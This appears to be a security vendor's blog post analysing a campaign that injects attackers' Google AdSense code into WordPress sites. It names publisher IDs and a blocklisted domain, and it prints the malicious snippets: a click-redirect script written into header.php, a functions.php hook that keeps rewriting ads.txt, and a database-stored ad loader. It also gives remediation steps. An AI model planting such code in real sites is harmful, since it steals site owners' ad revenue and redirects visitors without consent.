Ad-Jacked: Cybercriminals Inject Google Adsense into WordPress

Recently, we’ve encountered cases where WordPress websites were impacted by  Google Adsense hijackers. Attackers inject advertisements and scripts that steal website resources and pump ad views for their adsense accounts.

This is not the first time we’ve seen attackers abusing popular Google services. In a previous case, we discovered a credit card skimmer hiding inside Google Tag Manager, allowing attackers to steal payment information from Magento sites. Cybercriminals are leveraging trusted platforms like Google Adsense and Google Tag Manager to compromise websites.

So, What’s Google Ads and AdSense, Anyway?

Before diving into the technical details of this infection, it’s important to understand what Google Ads and AdSense are supposed to be in their legitimate form.

Google Ads is an online advertising platform developed by Google where advertisers bid to display brief advertisements, service offerings, product listings, or videos to web users. Advertisers pay to display ads within the Google ad network to web users.

Google AdSense, on the other hand, is a program run by Google through which website publishers can serve automatic text, image, video, or interactive media advertisements that are targeted to site content and audience. These ads are administered, sorted, and maintained by Google, and they can generate revenue on either a per-click or per-impression basis.

<!-- Google AdSense Example (Earn Money) -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-XXXXXXXXXX"></script>
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-XXXXXXXXXX"></ins>
<script>(adsbygoogle = window.adsbygoogle || []).push({});</script>

Website owners typically integrate these services by placing specific JavaScript code snippets on their pages, which then communicate with Google’s servers to display advertisements.

What We Found?

We dug into a bunch of sites and found some sneaky Google AdSense code that wasn’t supposed to be there.

• pub-9649546719576241
• pub-7310257338111337

Domains found in this campaign that are currently blocklisted by Sucuri:

• link-cpa-anda[.]com
• Asthmanotchcave[.]com

function restore_cpa_script() {
    $header_file = get_theme_file_path('/header.php');
    $cpa_script = '<script>
document.addEventListener("click", function(event) {
    if (!sessionStorage.getItem("cpaClicked")) {
        sessionStorage.setItem("cpaClicked", "true");
        window.open("https://asthmanotchcave.com/eg9krbt4?key=ca70d4de2caae26150e52db1074f79ed", "_blank");
    }
}, { once: true });
</script>';

How Many Sites Are We Talking About?

At the time of writing, at least 17 websites have been infected with these AdSense IDs.

Where is the Infection Found?

The malicious code has been found in multiple locations across infected WordPress sites, indicating a refined approach to ensure persistence even if one injection point is cleaned. The infection was discovered in:

• Theme’s functions.php file
• Inside the mu-plugins directory
• Inside various plugins directories
• Within the wp_options table, specifically in the option_name = wpheaderandfooter_basics entry

Analysis of the Malicious Code

Let’s examine the code that we found injected into these WordPress sites:

Code Found in Theme’s functions.php

Managing the ads.txt File

This piece of code was injected into functions.php to modify the ads.txt file and it will be recreated automatically, ensuring the attacker’s ad network remains active:

add_action('init', function() {
    $x1 = ABSPATH . 'ads.txt';
    $x2 = "google.com, pub-7310257338111337, DIRECT, f08c47fec0942fa0";

    if (!file_exists($x1) || trim(file_get_contents($x1)) !== trim($x2)) {
        if (file_exists($x1)) {
            unlink($x1);
        }
        file_put_contents($x1, $x2);
        chmod($x1, 0644);
        error_log("[ads.txt Monitor] File updated on " . date('Y-m-d H:i:s'));
    }
});

Infection Stored in wp_options Table

The database entry contained the following Google Ads script:

a:3:{s:18:"wp_header_textarea";s:155:"
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9649546719576241"
     crossorigin="anonymous"></script>";s:16:"wp_body_textarea";s:0:"";s:18:"wp_footer_textarea";s:0:"";}

This makes sure the unwanted ads are served dynamically through the database, ensuring persistence even if file-based injections are removed.

How Did This Malware Get In?

The exact entry point is unclear, but based on previous cases, these are the likely attack vectors:

• Compromised admin accounts – If an attacker gains access to the WordPress admin panel, they can modify files and database entries.
• Vulnerable plugins or themes – Exploiting known security flaws in outdated plugins or themes can provide access.
• Unsecured file permissions – Weak file permissions can allow unauthorized modifications.

Why Are They Doing This?

Simple: money. They’re trying to use your site’s resources to continue serving ads, and worse, they could be stealing your ad revenue if you’re using Adsense yourself. By injecting their own Google AdSense code, they get paid instead of you. And messing with the ads.txt file? That’s them trying to keep their ad network active on your site.

Impact of the Malware

The impact of this malware includes:

• Loss of Revenue: Legitimate website owners lose potential ad revenue as the attackers redirect it to their own accounts.
• Compromised User Experience: Unexpected ads can disrupt the user experience and can lead to a loss of trust and traffic.
• SEO Damage: Malicious code injection can negatively impact a website’s SEO, potentially leading to lower search engine rankings.
• Security Risks: The injected code may be a gateway for further malicious activities, such as malware distribution or data theft.

Remediation Steps:

If you find your site infected with fake Google Ads, follow these steps:

• Scan your website – Use tools like Sucuri’s free SiteCheck to detect malware.
• Remove the infected code – Check header.php, functions.php, the mu-plugins directory, and the wp_options table.
• Update everything – Ensure WordPress, plugins, and themes are updated.
• Change all passwords – Update WordPress admin, database, and hosting passwords.
• Set proper file permissions – Restrict write access to critical files.
• Enable a Web Application Firewall (WAF) – A WAF can block malicious requests before they reach your site.

Conclusion

This latest campaign of Google AdSense hijackers demonstrates how attackers continue to evolve their tactics, leveraging trusted platforms like Google AdSense to keep their revenue streams flowing. By understanding how these infections operate and where they hide, website owners can better protect their sites and visitors from these increasingly sophisticated threats.

As we’ve seen with this case and our previous investigation into Google Tag Manager (GTM) being used for credit card skimming, attackers are increasingly targeting legitimate third-party services that websites commonly integrate.

If you’re running a WordPress site, regularly scan your files, monitor your database, and implement security best practices to keep your website safe.